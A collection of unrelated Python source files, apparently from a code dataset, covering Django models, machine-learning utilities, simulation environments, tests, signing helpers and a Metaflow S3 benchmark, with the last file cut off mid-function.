admin.site.register(models.Subscription, SubscriptionAdmin)
admin.site.register(models.Subscriber, SubscriberAdmin)
admin.site.register(models.ContentFeedRecord, ContentFeedRecordAdmin)
#admin.site.register(models.SearchSubscription)
#admin.site.register(models.EmailChannel)
#admin.site.register(models.RssChannel)
#admin.site.register(models.SmsChannel)
470531
from collections import OrderedDict
import numpy as np
import plaidml
import plaidml.tile as tile
import plaidml.keras
plaidml.keras.install_backend()
import keras.backend as K
class SandboxOp(tile.Operation):
def __init__(self, code, a, b, output_shape):
super(SandboxOp, self).__init__(code, [('A', a), ('B', b)], [('O', output_shape)])
def main(code, tensor_A, tensor_B, output_shape):
print(K.backend())
op = SandboxOp(code, tensor_A, tensor_B, tile.Shape(plaidml.DType.FLOAT32, output_shape))
print(op.sole_output().shape)
print(op.sole_output().eval())
if __name__ == '__main__':
plaidml._internal_set_vlog(1)
A = K.variable(np.arange(12).reshape(4, 3))
B = K.variable(np.arange(3).reshape(3))
code = """function (A[N, M], B[M]) -> (O) {
O[i, j: N, M] = =(A[i, j] + B[j]), i/2 + j/2 + 1/2 < 2;
}"""
out_shape = (2, 3)
main(code, A, B, out_shape)
470562
import math
import numpy as np
import pyqtgraph
import pyqtgraph.dockarea
from pyqtgraph.Qt import QtCore, QtGui
class StdHitOffsets():
def run(self, replay=None):
replay_idx = 0 if replay==None else replay
self.__init_gui_elements(replay_idx)
self.__construct_gui()
self.__set_data(replay_idx)
self.win.show()
return self.win
def __init_gui_elements(self, replay_idx):
self.win = QtGui.QMainWindow() #pyqtgraph.GraphicsWindow(title=)
self.area = pyqtgraph.dockarea.DockArea()
self.dock_scatter = pyqtgraph.dockarea.Dock('Scatterplot', size=(500,400))
self.dock_offset_freq_distr = pyqtgraph.dockarea.Dock('Hit offset freq', size=(500,200))
self.dock_offset_dist_distr = pyqtgraph.dockarea.Dock('Hit offset vs distance freq', size=(500,200))
self.hit_offset_scatter_plot = pyqtgraph.PlotWidget(title='Hits scatterplot')
self.hit_offset_distr_plot = pyqtgraph.PlotWidget(title='Hits distribution')
self.scatter_data_plot = self.hit_offset_scatter_plot.plot()
self.distr_data_plot = self.hit_offset_distr_plot.plot()
self.model_data_plot = self.hit_offset_distr_plot.plot()
def __construct_gui(self):
self.dock_offset_freq_distr.addWidget(self.hit_offset_scatter_plot)
self.dock_offset_dist_distr.addWidget(self.hit_offset_distr_plot)
self.area.addDock(self.dock_offset_freq_distr, 'top')
self.area.addDock(self.dock_offset_dist_distr, 'bottom')
self.win.setCentralWidget(self.area)
def __set_data(self, replay_idx):
self.win.setWindowTitle(get_beatmap().metadata.name + ' ' + get_replays()[replay_idx].get_name())
# Data extraction
map_data = StdMapData.get_map_data(get_beatmap().hitobjects)
replay_data = get_replay_data()[replay_idx]
score_data = StdScoreData.get_score_data(replay_data, map_data)
timing_data = score_data['replay_t']
hitoffset_data = score_data['replay_t'] - score_data['map_t']
self.hit_offset_scatter_plot.addLine(x=None, y=0, pen=pyqtgraph.mkPen('r', width=1))
self.hit_offset_scatter_plot.setLabel('left', 'Hit offset', units='ms', unitPrefix='')
self.hit_offset_scatter_plot.setLabel('bottom', 'Time since start', units='ms', unitPrefix='')
self.scatter_data_plot.setData(timing_data, hitoffset_data, pen=None, symbol='o', symbolPen=None, symbolSize=2, symbolBrush=(100, 100, 255, 200))
# Plotting distribution of hits
vec_normal_distr = np.vectorize(self.__normal_distr)
avg = np.mean(hitoffset_data)
std = np.std(hitoffset_data)
freqs = pyqtgraph.pseudoScatter(np.hstack(hitoffset_data), spacing=1)
self.distr_data_plot.setData(hitoffset_data, freqs, pen=None, symbol='o', symbolSize=5, symbolPen=(255,255,255,150), symbolBrush=(0,0,255,150))
hits = np.arange(-200, 200)
pdf = vec_normal_distr(hits, avg, std)
self.hit_offset_distr_plot.setLabel('left', '# of hits', units='', unitPrefix='')
self.hit_offset_distr_plot.setLabel('bottom', 'Hit offset', units='ms', unitPrefix='')
self.model_data_plot.setData(hits, pdf*len(hitoffset_data), pen='y')
    def __normal_distr(self, x, avg, std):
        # Gaussian probability density function with mean `avg` and standard deviation `std`
        return 1/(std*((2*math.pi)**0.5))*math.exp(-0.5*((x - avg)/std)**2)
470585
import numpy as np
from rpn.utils.torch_utils import to_tensor, to_numpy
import torch
try:
from torch_geometric.data import Data, batch
except ImportError as e:
print('Warning: cannot import torch_geometric. This does not affect the core functionality of this repo.')
def add_supernodes(node_index, edge_index, supernode_clique):
"""
Add supernodes to an existing graph defined by node_index and edge_index.
Supernodes are defined by supernode_clique, which is a list of cliques (set of nodes)
:param node_index: [N]
:param edge_index: [E, 2]
:param supernode_clique: [SN, C]
:return: new_node_index: [N + SN], new_edge_index: [E + SN * (SN - 1) + C * 2 * SN]
"""
num_sn = len(supernode_clique)
sn_start_idx = node_index.max() + 1
sn_node_index = np.arange(num_sn) + sn_start_idx
sn_edge_index = [edge_index]
# add bi-directional edge to the supernode from each node in the clique
for sni, snc in zip(sn_node_index, supernode_clique):
clique_edge = np.zeros((len(snc) * 2, 2), dtype=np.int64)
clique_edge[:len(snc), 0] = snc
clique_edge[len(snc):, 0] = sni
clique_edge[:len(snc), 1] = sni
clique_edge[len(snc):, 1] = snc
sn_edge_index.append(clique_edge)
# add connections among the supernodes
sn_edge_index.append(fully_connected_edges(sn_node_index))
return np.concatenate([node_index, sn_node_index]), np.concatenate(sn_edge_index)
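# Worked shape check for the formulas in add_supernodes' docstring (kept as comments
# so importing this module stays side-effect free): a 3-node path graph with one
# supernode covering all 3 nodes has N=3, E=2, SN=1, C=3, so the result should have
# N + SN = 4 nodes and E + SN*(SN-1) + C*2*SN = 2 + 0 + 6 = 8 edges, e.g.
#   n_idx = np.arange(3); e_idx = np.array([[0, 1], [1, 2]])
#   new_n, new_e = add_supernodes(n_idx, e_idx, [n_idx])
#   assert len(new_n) == 4 and len(new_e) == 8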
def fully_connected_edges(node_index, self_connection=False):
"""
Return fully connected edges (no self-connection)
:param node_index: node indices
:param self_connection:
:return: [N * (N - 1), 2]
"""
n = len(node_index)
if not self_connection:
edges = np.zeros([n * (n - 1), 2], dtype=np.int64)
else:
edges = np.zeros([n ** 2, 2], dtype=np.int64)
count = 0
for r in range(n):
for c in range(n):
if r != c or self_connection:
                # reference the given node indices rather than their positions, so
                # callers such as add_supernodes get edges between the actual ids
                edges[count, :] = [node_index[r], node_index[c]]
count += 1
return edges
def split_graph_feature(node_feat, edge_feat, node_index_list, edge_index_list):
"""
Split batched node and edge features (graph features) to individual lists
:param node_feat: torch.Tensor of shape [N1 + N2 + ..., D1]
:param edge_feat: torch.Tensor of shape [E1 + E2 + ..., D2]
:param node_index_list: a list of node indices, in the form of numpy array
:param edge_index_list: a list of edge indices, in the form of numpy array
:return: node_feat_least: [[N1, D1], [N2, D1], ...], edge_feat_list: [[E1, D2], [E2, D2], ...]
"""
node_feat_list = split_clique_feature(node_feat, node_index_list)
edge_feat_list = split_clique_feature(edge_feat, edge_index_list)
return node_feat_list, edge_feat_list
def split_clique_feature(clique_feat, clique_index_list):
assert(isinstance(clique_index_list, (tuple, list)))
num_element = [e.shape[0] for e in clique_index_list]
assert(clique_feat.size(0) == np.sum(num_element))
clique_feat_list = clique_feat.split(num_element, dim=0)
return clique_feat_list
def collate_torch_graphs(node_feat, edge_feat, node_index_list, edge_index_list):
"""
Collate a list of graphs and their features.
:param node_feat: torch.Tensor of shape [N1 + N2 + ..., D1]
:param edge_feat: torch.Tensor of shape [E1 + E2 + ..., D2]
:param node_index_list: a list of node indices, in the form of numpy array
:param edge_index_list: a list of edge indices, in the form of numpy array
:return: a collated graph of type torch.geometric.data.Data
"""
node_feat_list, edge_feat_list = split_graph_feature(node_feat, edge_feat, node_index_list, edge_index_list)
graphs = []
# TODO: vectorize this
for nf, ef, n_idx, e_idx in zip(node_feat_list, edge_feat_list, node_index_list, edge_index_list):
# add supernode to the graph
supernode_clique = np.tile(n_idx[None, ...], (len(e_idx), 1))
sn_n_idx, sn_e_idx = add_supernodes(n_idx, e_idx, supernode_clique)
sn_feat = torch.cat([nf, ef], dim=0)
torch_e_idx = to_tensor(sn_e_idx).long().t().contiguous().to(node_feat.device)
graphs.append(Data(x=sn_feat, edge_index=torch_e_idx))
batched_graphs = batch.Batch.from_data_list(graphs)
num_node = [n.shape[0] for n in node_index_list]
num_edge = [e.shape[0] for e in edge_index_list]
assert(batched_graphs.x.shape[0] == (np.sum(num_node) + np.sum(num_edge)))
return batched_graphs
def separate_graph_collated_features(collated_feat, node_index_list, edge_index_list):
"""
Separate a collated feature by a list of graphs
:param collated_feat: feature of shape [N + E, D]
:param node_index_list: a list of node index
:param edge_index_list: a list of edge index
:return: separated node and edge features of shape [N, D] and [E, D], respectively
"""
num_node = [n.shape[0] for n in node_index_list]
num_edge = [e.shape[0] for e in edge_index_list]
num_feat = np.sum(num_node) + np.sum(num_edge)
assert(collated_feat.size(0) == num_feat)
num_feat_list = [None] * (len(num_node) + len(num_edge))
num_feat_list[::2] = num_node
num_feat_list[1::2] = num_edge
feat_list = collated_feat.split(num_feat_list, dim=0)
node_feat = torch.cat(feat_list[::2], dim=0)
edge_feat = torch.cat(feat_list[1::2], dim=0)
assert(node_feat.shape[0] == np.sum(num_node))
assert(edge_feat.shape[0] == np.sum(num_edge))
return node_feat, edge_feat
def test_graph_collation():
node_index, edge_index = construct_full_graph(5)
node_input = torch.randn(10, 10)
edge_input = [get_edge_features(node_input[:5], edge_index, lambda a, b: b - a),
get_edge_features(node_input[:5], edge_index, lambda a, b: b - a)]
edge_input = torch.cat(edge_input, dim=0)
node_index = [node_index, node_index]
edge_index = [edge_index, edge_index]
gs = collate_torch_graphs(node_input, edge_input, node_index, edge_index)
ni, ei = separate_graph_collated_features(gs.x, node_index, edge_index)
assert(to_numpy(torch.all(ei == edge_input)) == 1)
assert(to_numpy(torch.all(ni == node_input)) == 1)
def construct_full_graph(num_objects, self_connection=False):
node_index = np.arange(num_objects)
edge_index = fully_connected_edges(node_index, self_connection=self_connection)
return node_index, edge_index
def get_edge_features(node_features, edge_index, feature_func):
return feature_func(node_features[edge_index[:, 0], ...], node_features[edge_index[:, 1], ...])
def main():
node_idx = np.array([0, 1, 2], dtype=np.int64)
edge_idx = np.array([[0, 1], [0, 2]], dtype=np.int64)
supernode_clique = np.tile(node_idx[None, ...], (len(edge_idx), 1))
new_node_idx, new_edge_idx = add_supernodes(node_idx, edge_idx, supernode_clique)
node_features = np.array([[0, 0, 0], [1, 1, 1], [2, 2, 2]])
edge_feat = get_edge_features(node_features, edge_idx, lambda a, b: b - a)
print()
if __name__ == '__main__':
main()
|
470594
|
import pytest
from mage.node2vec_online_module.w2v_learners import GensimWord2Vec
EMBEDDINGS_DIM = 2
INCORRECT_NEGATIVE_RATE = -1
@pytest.fixture
def w2v_learner():
return GensimWord2Vec(
embedding_dimension=EMBEDDINGS_DIM,
learning_rate=0.01,
skip_gram=True,
negative_rate=0,
threads=1,
)
@pytest.fixture
def w2v_learner_wrong_negative_rate():
return GensimWord2Vec(
embedding_dimension=EMBEDDINGS_DIM,
learning_rate=0.01,
skip_gram=True,
negative_rate=INCORRECT_NEGATIVE_RATE,
threads=1,
)
def test_calculate_embeddings(w2v_learner):
sentences = [[1, 2], [2, 4], [3, 2]]
w2v_learner.partial_fit(sentences)
embeddings_dict = w2v_learner.get_embedding_vectors()
assert len(embeddings_dict) == 4
def test_correct_embedding_dimension(w2v_learner):
sentences = [[1, 2], [2, 4], [3, 2]]
w2v_learner.partial_fit(sentences)
embeddings_dict = w2v_learner.get_embedding_vectors()
for key, value in embeddings_dict.items():
assert len(value) == EMBEDDINGS_DIM
def test_incorrect_negative_rate(w2v_learner_wrong_negative_rate):
assert w2v_learner_wrong_negative_rate.negative_rate == INCORRECT_NEGATIVE_RATE
assert w2v_learner_wrong_negative_rate.embedding_dimension == EMBEDDINGS_DIM
sentences = [[1, 2], [2, 4], [3, 2]]
w2v_learner_wrong_negative_rate.partial_fit(sentences)
assert w2v_learner_wrong_negative_rate.negative_rate == 0
def test_correct_training(w2v_learner):
sentences = [[1, 2], [2, 4], [3, 2]]
w2v_learner.partial_fit(sentences)
calculated_embeddings_dict = w2v_learner.get_embedding_vectors()
non_existing_sentence = [[3, 4]]
w2v_learner.partial_fit(non_existing_sentence)
new_embeddings_dict = w2v_learner.get_embedding_vectors()
for key, value in calculated_embeddings_dict.items():
assert key in new_embeddings_dict
        assert all(a == b for a, b in zip(value, new_embeddings_dict[key]))
|
470626
|
from bitmovin_api_sdk.encoding.outputs.s3_role_based.s3_role_based_api import S3RoleBasedApi
from bitmovin_api_sdk.encoding.outputs.s3_role_based.customdata.customdata_api import CustomdataApi
from bitmovin_api_sdk.encoding.outputs.s3_role_based.s3_role_based_output_list_query_params import S3RoleBasedOutputListQueryParams
|
470670
|
import os
from datetime import timedelta
DATABASE_URI = os.environ["DATABASE_URI"]
ENCRYPTION_KEY = os.environ["ENCRYPTION_KEY"]
BIND_HOST = os.environ.get("BIND_HOST", "localhost")
BIND_PORT = int(os.environ.get("BIND_PORT", "80"))
SCHEDULE_INTERVAL = timedelta(
seconds=int(os.environ.get("SHEDULE_INTERVAL_SECONDS", 50))
)
|
470726
|
from collections import deque
from typing import List
class Solution:
def deckRevealedIncreasing(self, deck: List[int]) -> List[int]:
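        # Reverse-simulate the reveal process with a deque: take the cards from
        # largest to smallest, move the bottom card to the top (rotate right by
        # one), then place the current card on top. Undoing "reveal the top,
        # then move the next card to the bottom" this way yields the ordering
        # that reveals the deck in increasing order.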
d = deque()
for x in sorted(deck)[::-1]:
d.rotate()
d.appendleft(x)
return list(d)
|
470737
|
from server.util.tags import COLLECTION_SET_PARTISANSHIP_QUINTILES_2019
from server.util.csv import SOURCE_LIST_CSV_METADATA_PROPS
SOURCE_LIST_CSV_EDIT_PROPS = ['media_id', 'url', 'name'] + \
SOURCE_LIST_CSV_METADATA_PROPS + \
['public_notes', 'editor_notes', 'stories_per_day', 'first_story']
SOURCE_FEED_LIST_CSV_PROPS = ['media_id', 'url', 'name'] + \
['public_notes', 'editor_notes', 'stories_per_day', 'first_story', 'active_feed_count',
'num_stories_90', 'latest_scrape_job', 'num_stories_last_year']
|
470742
|
import os
import torch
import numpy as np
import matplotlib.pyplot as plt
from main import Network
if __name__ == '__main__':
    # the saved object is a full Network instance (hence the import above) and
    # holds not only the weights but also the convergence history
network = torch.load('../data/english_full/latest_weights')
current_path = os.path.dirname(os.path.realpath(__file__))
    savedir = current_path + '/../results/EN_short_dataset_labeled'
    os.makedirs(savedir, exist_ok=True)  # make sure the output directory exists before saving figures
plt.title('convergence for the 200th datapoint')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.arc_loss_particular, 'b-', label='arc loss')
plt.plot(network.label_loss_particular, 'g-', label='label loss')
plt.plot(network.total_loss_particular, 'r-', label='total loss')
plt.legend()
plt.savefig(savedir + '/convergence_particular.png')
plt.clf()
plt.title('convergence for the dataset')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.arc_loss, 'b-', label='arc loss')
plt.plot(network.label_loss, 'g-', label='label loss')
plt.plot(network.total_loss, 'r-', label='total loss')
plt.legend()
plt.savefig(savedir + '/convergence.png')
plt.clf()
plt.title('arc loss for the 200th datapoint')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.arc_loss_particular, 'b-')
plt.savefig(savedir + '/arc_loss_particular.png')
plt.clf()
plt.title('label loss for the 200th datapoint')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.label_loss_particular, 'g-')
plt.savefig(savedir + '/label_loss_particular.png')
plt.clf()
plt.title('total loss for the 200th datapoint')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.total_loss_particular, 'r-')
plt.savefig(savedir + '/total_loss_particular.png')
plt.clf()
plt.title('arc loss of the dataset')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.arc_loss, 'b-')
plt.savefig(savedir + '/arc_loss.png')
plt.clf()
plt.title('label loss of the dataset')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.label_loss, 'g-')
plt.savefig(savedir + '/label_loss.png')
plt.clf()
plt.title('total loss of the dataset')
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(network.total_loss, 'r-')
plt.savefig(savedir + '/total_loss.png')
plt.clf()
|
470744
|
import os
import numpy as np
from gym import spaces, utils
from mjrl.envs import mujoco_env
from mujoco_py import MjViewer
from d4rl import offline_env
ADD_BONUS_REWARDS = True
class RelocateEnvV0(mujoco_env.MujocoEnv, utils.EzPickle, offline_env.OfflineEnv):
def __init__(self, **kwargs):
offline_env.OfflineEnv.__init__(self, **kwargs)
self.target_obj_sid = 0
self.S_grasp_sid = 0
self.obj_bid = 0
curr_dir = os.path.dirname(os.path.abspath(__file__))
mujoco_env.MujocoEnv.__init__(self, curr_dir + "/assets/DAPG_relocate.xml", 5)
# Override action_space to -1, 1
self.action_space = spaces.Box(
low=-1.0, high=1.0, dtype=np.float32, shape=self.action_space.shape
)
# change actuator sensitivity
self.sim.model.actuator_gainprm[
self.sim.model.actuator_name2id("A_WRJ1") : self.sim.model.actuator_name2id(
"A_WRJ0"
)
+ 1,
:3,
] = np.array([10, 0, 0])
self.sim.model.actuator_gainprm[
self.sim.model.actuator_name2id("A_FFJ3") : self.sim.model.actuator_name2id(
"A_THJ0"
)
+ 1,
:3,
] = np.array([1, 0, 0])
self.sim.model.actuator_biasprm[
self.sim.model.actuator_name2id("A_WRJ1") : self.sim.model.actuator_name2id(
"A_WRJ0"
)
+ 1,
:3,
] = np.array([0, -10, 0])
self.sim.model.actuator_biasprm[
self.sim.model.actuator_name2id("A_FFJ3") : self.sim.model.actuator_name2id(
"A_THJ0"
)
+ 1,
:3,
] = np.array([0, -1, 0])
self.target_obj_sid = self.sim.model.site_name2id("target")
self.S_grasp_sid = self.sim.model.site_name2id("S_grasp")
self.obj_bid = self.sim.model.body_name2id("Object")
utils.EzPickle.__init__(self)
self.act_mid = np.mean(self.model.actuator_ctrlrange, axis=1)
self.act_rng = 0.5 * (
self.model.actuator_ctrlrange[:, 1] - self.model.actuator_ctrlrange[:, 0]
)
def step(self, a):
a = np.clip(a, -1.0, 1.0)
        try:
            a = self.act_mid + a * self.act_rng  # mean center and scale
        except AttributeError:
            pass  # only for the initialization phase, before act_mid/act_rng are set
self.do_simulation(a, self.frame_skip)
ob = self.get_obs()
obj_pos = self.data.body_xpos[self.obj_bid].ravel()
palm_pos = self.data.site_xpos[self.S_grasp_sid].ravel()
target_pos = self.data.site_xpos[self.target_obj_sid].ravel()
reward = -0.1 * np.linalg.norm(palm_pos - obj_pos) # take hand to object
if obj_pos[2] > 0.04: # if object off the table
reward += 1.0 # bonus for lifting the object
reward += -0.5 * np.linalg.norm(
palm_pos - target_pos
) # make hand go to target
reward += -0.5 * np.linalg.norm(
obj_pos - target_pos
) # make object go to target
if ADD_BONUS_REWARDS:
if np.linalg.norm(obj_pos - target_pos) < 0.1:
reward += 10.0 # bonus for object close to target
if np.linalg.norm(obj_pos - target_pos) < 0.05:
reward += 20.0 # bonus for object "very" close to target
goal_achieved = True if np.linalg.norm(obj_pos - target_pos) < 0.1 else False
return ob, reward, False, dict(goal_achieved=goal_achieved)
def get_obs(self):
# qpos for hand
# xpos for obj
# xpos for target
qp = self.data.qpos.ravel()
obj_pos = self.data.body_xpos[self.obj_bid].ravel()
palm_pos = self.data.site_xpos[self.S_grasp_sid].ravel()
target_pos = self.data.site_xpos[self.target_obj_sid].ravel()
return np.concatenate(
[qp[:-6], palm_pos - obj_pos, palm_pos - target_pos, obj_pos - target_pos]
)
def reset_model(self):
qp = self.init_qpos.copy()
qv = self.init_qvel.copy()
self.set_state(qp, qv)
self.model.body_pos[self.obj_bid, 0] = self.np_random.uniform(
low=-0.15, high=0.15
)
self.model.body_pos[self.obj_bid, 1] = self.np_random.uniform(
low=-0.15, high=0.3
)
self.model.site_pos[self.target_obj_sid, 0] = self.np_random.uniform(
low=-0.2, high=0.2
)
self.model.site_pos[self.target_obj_sid, 1] = self.np_random.uniform(
low=-0.2, high=0.2
)
self.model.site_pos[self.target_obj_sid, 2] = self.np_random.uniform(
low=0.15, high=0.35
)
self.sim.forward()
return self.get_obs()
def get_env_state(self):
"""
Get state of hand as well as objects and targets in the scene
"""
qp = self.data.qpos.ravel().copy()
qv = self.data.qvel.ravel().copy()
hand_qpos = qp[:30]
obj_pos = self.data.body_xpos[self.obj_bid].ravel()
palm_pos = self.data.site_xpos[self.S_grasp_sid].ravel()
target_pos = self.data.site_xpos[self.target_obj_sid].ravel()
return dict(
hand_qpos=hand_qpos,
obj_pos=obj_pos,
target_pos=target_pos,
palm_pos=palm_pos,
qpos=qp,
qvel=qv,
)
def set_env_state(self, state_dict):
"""
Set the state which includes hand as well as objects and targets in the scene
"""
qp = state_dict["qpos"]
qv = state_dict["qvel"]
obj_pos = state_dict["obj_pos"]
target_pos = state_dict["target_pos"]
self.set_state(qp, qv)
self.model.body_pos[self.obj_bid] = obj_pos
self.model.site_pos[self.target_obj_sid] = target_pos
self.sim.forward()
def mj_viewer_setup(self):
self.viewer = MjViewer(self.sim)
self.viewer.cam.azimuth = 90
self.sim.forward()
self.viewer.cam.distance = 1.5
def evaluate_success(self, paths):
num_success = 0
num_paths = len(paths)
# success if object close to target for 25 steps
for path in paths:
if np.sum(path["env_infos"]["goal_achieved"]) > 25:
num_success += 1
success_percentage = num_success * 100.0 / num_paths
return success_percentage
|
470753
|
import sys
sys.path.append("/workdata/pygdsm")
import pylab as plt
import healpy as hp
from datetime import datetime
from pygdsm import HaslamSkyModel, HaslamObserver, GSMObserver
def test_compare_gsm_to_old():
    gl = HaslamSkyModel(freq_unit='MHz')
    dl = gl.generate(408)
    gl.view()
    plt.show()
def test_observer_test():
# Setup observatory location - in this case, Parkes Australia
(latitude, longitude, elevation) = ('-32.998370', '148.263659', 100)
ov = HaslamObserver()
ov.lon = longitude
ov.lat = latitude
ov.elev = elevation
ov.date = datetime(2000, 1, 1, 23, 0)
ov.generate(200)
d = ov.view(logged=True)
ov = GSMObserver()
ov.lon = longitude
ov.lat = latitude
ov.elev = elevation
ov.date = datetime(2000, 1, 1, 23, 0)
ov.generate(200)
d = ov.view(logged=True)
plt.show()
if __name__ == "__main__":
test_compare_gsm_to_old()
test_observer_test()
|
470754
|
import cv2
import sys, json
import argparse
from xml.dom import minidom
import numpy as np
import os
new_jsons = 'newjsons'
for p in [new_jsons]:
if not os.path.exists(p):
os.makedirs(p)
ap = argparse.ArgumentParser()
ap.add_argument('-t', '--path_annotation_jsons', required=True, help='path to the directory with annotation JSON files')
args = ap.parse_args()
jsons_names = [img for img in os.listdir(args.path_annotation_jsons) if img.endswith(".json")]
all_labels = {}
for js in jsons_names:
fpath = args.path_annotation_jsons+'/'+js
    with open(fpath, 'r') as f_in:
        fdata = json.load(f_in)
newdata = {}
nvoids = 0
for key in fdata:
if key == 'shapes':
newdata['shapes'] = []
for m in fdata['shapes']:
m['label'] = m['label'].lower()
if m['label'] == 'void':
nvoids += 1
continue
newdata['shapes'].append(m)
else:
newdata[key] = fdata[key]
    print('removed %d voids from %s and saved the new file to %s/%s' % (nvoids, js, new_jsons, js))
    with open(new_jsons + '/' + js, 'w') as f_out:
        json.dump(newdata, f_out)
|
470758
|
import json
import sys
import six
from six.moves.urllib_parse import urlparse
class Request:
def __init__(self, raw_json):
self.headers = raw_json['headers']
self.method = raw_json['method']
self.body = raw_json['body']
self.url = raw_json['url']
self.ip = raw_json['remote_addr']
components = urlparse(self.url)
self.path = components.path
self.host = components.hostname
self.scheme = components.scheme
self.query = components.query
self.port = components.port
self.fragment = components.fragment
self.params = components.params
self.netloc = components.netloc
class Response:
def __init__(self, headers=None, body='', status_code=200):
self.headers = {} if headers is None else headers
if isinstance(body, (six.text_type, six.binary_type, dict, list)):
self.body = body
else:
self.body = str(body)
self.status_code = status_code
def _json_string(self):
return json.dumps({
'body': self.body,
'status_code': self.status_code,
'headers': self.headers,
})
def handle_http_event(handle_fn):
req = Request(json.loads(sys.stdin.read()))
res = handle_fn(req)
if isinstance(res, Response):
sys.stdout.write(res._json_string())
else:
sys.stdout.write(Response()._json_string())
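# Illustrative (hypothetical) usage: a handler wired through handle_http_event,
# which reads the JSON-encoded request from stdin and echoes the path back.
#
#   def handler(req):
#       return Response(body={'path': req.path}, status_code=200)
#
#   handle_http_event(handler)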
|
470775
|
import hashlib
import hmac as _hmac
from flask import current_app
from itsdangerous import Signer
from itsdangerous.exc import ( # noqa: F401
BadSignature,
BadTimeSignature,
SignatureExpired,
)
from itsdangerous.url_safe import URLSafeTimedSerializer
from CTFd.utils import string_types
def serialize(data, secret=None):
if secret is None:
secret = current_app.config["SECRET_KEY"]
s = URLSafeTimedSerializer(secret)
return s.dumps(data)
def unserialize(data, secret=None, max_age=432000):
if secret is None:
secret = current_app.config["SECRET_KEY"]
s = URLSafeTimedSerializer(secret)
return s.loads(data, max_age=max_age)
def sign(data, secret=None):
if secret is None:
secret = current_app.config["SECRET_KEY"]
s = Signer(secret)
return s.sign(data)
def unsign(data, secret=None):
if secret is None:
secret = current_app.config["SECRET_KEY"]
s = Signer(secret)
return s.unsign(data)
def hmac(data, secret=None, digest=hashlib.sha1):
if secret is None:
secret = current_app.config["SECRET_KEY"]
if isinstance(data, string_types):
data = data.encode("utf-8")
if isinstance(secret, string_types):
secret = secret.encode("utf-8")
return _hmac.new(key=secret, msg=data, digestmod=digest).hexdigest()
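# Illustrative usage (hypothetical values), inside a Flask app context so the
# default SECRET_KEY can be pulled from current_app:
#   token = serialize({"user_id": 1})
#   data = unserialize(token, max_age=3600)
#   mac = hmac("some payload")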
|
470777
|
from django.db import models
from django.contrib.auth.backends import UserModel
class TblClass(models.Model):
name = models.CharField(max_length=100, help_text="班级名称")
tag = models.CharField(max_length=100, unique=True, help_text="标签")
    # null=True allows NULL in the database; blank=True allows the field to be left empty in forms
description = models.CharField(max_length=512, null=True, blank=True, help_text="班级描述")
    # db_constraint=False drops the database-level constraint while keeping related-object queries
users = models.ManyToManyField(UserModel, related_name='classes', help_text="班级成员")
class Meta:
db_table = 'tbl_class'
|
470785
|
import os
from metaflow import FlowSpec, step, Parameter, S3, profile, parallel_map
URL = 's3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488519735.70/wet/'
def load_s3(s3, num):
files = list(s3.list_recursive([URL]))[:num]
total_size = sum(f.size for f in files) / 1024**3
stats = {}
with profile('downloading', stats_dict=stats):
loaded = s3.get_many([f.url for f in files])
s3_gbps = (total_size * 8) / (stats['downloading'] / 1000.)
print("S3->EC2 throughput: %2.1f Gb/s" % s3_gbps)
return [obj.path for obj in loaded]
class S3BenchmarkFlow(FlowSpec):
local_dir = Parameter('local_dir',
help='Read local files from this directory')
num = Parameter('num_files',
help='maximum number of files to read',
default=50)
@step
def start(self):
with S3() as s3:
with profile('Loading and processing'):
if self.local_dir:
files = [os.path.join(self.local_dir, f)
for f in os.listdir(self.local_dir)][:self.num]
else:
files = load_s3(s3, self.num)
print("Reading %d objects" % len(files))
stats = {}
with profile('reading', stats_dict=stats):
size = sum(parallel_map(lambda x: len(open(x, 'rb').read()),
files)) / 1024**3
read_gbps = (size * 8) / (stats['reading'] / 1000.)
print("Read %2.fGB. Throughput: %2.1f Gb/s" % (size, read_gbps))
self.next(self.end)
@step
def end(self):
pass
if __name__ == '__main__':
S3BenchmarkFlow()
|
470801
|
import os
import pytest
from six import text_type
from leapp.libraries.actor import checksendmail
@pytest.mark.parametrize('test_input,migrate', [
('IPv6:::1\n', True),
('IPv6:0:0:0:0:0:0:0:1\n', False),
])
def test_check_migration(tmpdir, monkeypatch, test_input, migrate):
test_cfg_path = text_type(tmpdir)
test_cfg_file = os.path.join(test_cfg_path, 'sendmail.cf')
with open(test_cfg_file, 'w') as file_out:
file_out.write(test_input)
monkeypatch.setattr(checksendmail, 'SendmailConfDir', test_cfg_path)
files = checksendmail.check_files_for_compressed_ipv6()
if migrate:
assert files == [test_cfg_file]
else:
assert files == []
|
470806
|
from concurrent import futures
import time
import grpc
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', datefmt='%Y-%m-%d:%H:%M:%S', level=logging.DEBUG)
import temperature_bands_pb2
import temperature_bands_pb2_grpc
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
# getting the utils file here
import os, sys
import xbos_services_utils3 as utils
import datetime
import pytz
import numpy as np
import pandas as pd
import yaml
import traceback
from pathlib import Path
DAYS_IN_WEEK = 7
TEMPERATURE_BANDS_DATA_PATH = Path(os.environ["TEMPERATURE_BANDS_DATA_PATH"])
TEMPERATURE_BANDS_HOST_ADDRESS = os.environ["TEMPERATURE_BANDS_HOST_ADDRESS"]
def _get_temperature_band_config(building, zone):
band_path = str(TEMPERATURE_BANDS_DATA_PATH / building / (zone + ".yml"))
if os.path.exists(band_path):
with open(band_path, "r") as f:
try:
                config = yaml.safe_load(f)
except yaml.YAMLError:
return None, "yaml could not read file at: %s" % band_path
else:
return None, "consumption file could not be found. path: %s." % band_path
return config, None
def _get_week_comfortband(building, zone, date, interval):
"""
Gets the whole comfortband from the zone configuration file. Correctly Resamples the data according to interval
:param date: The date for which we want to start the week. Timezone aware.
:param interval: int:seconds. The interval/frequency of resampling. Has to be such that 60 % interval == 0
:return: pd.df (col = "t_low", "t_high") with time_series index for the date provided and in timezone aware and in timezone of data input.
"""
config, err = _get_temperature_band_config(building, zone)
if config is None:
return None, err
# Set the date to the controller timezone.
building_date = date.astimezone(tz=pytz.timezone(config["tz"]))
weekday = building_date.weekday()
list_data = []
comfortband_data = config["comfortband"]
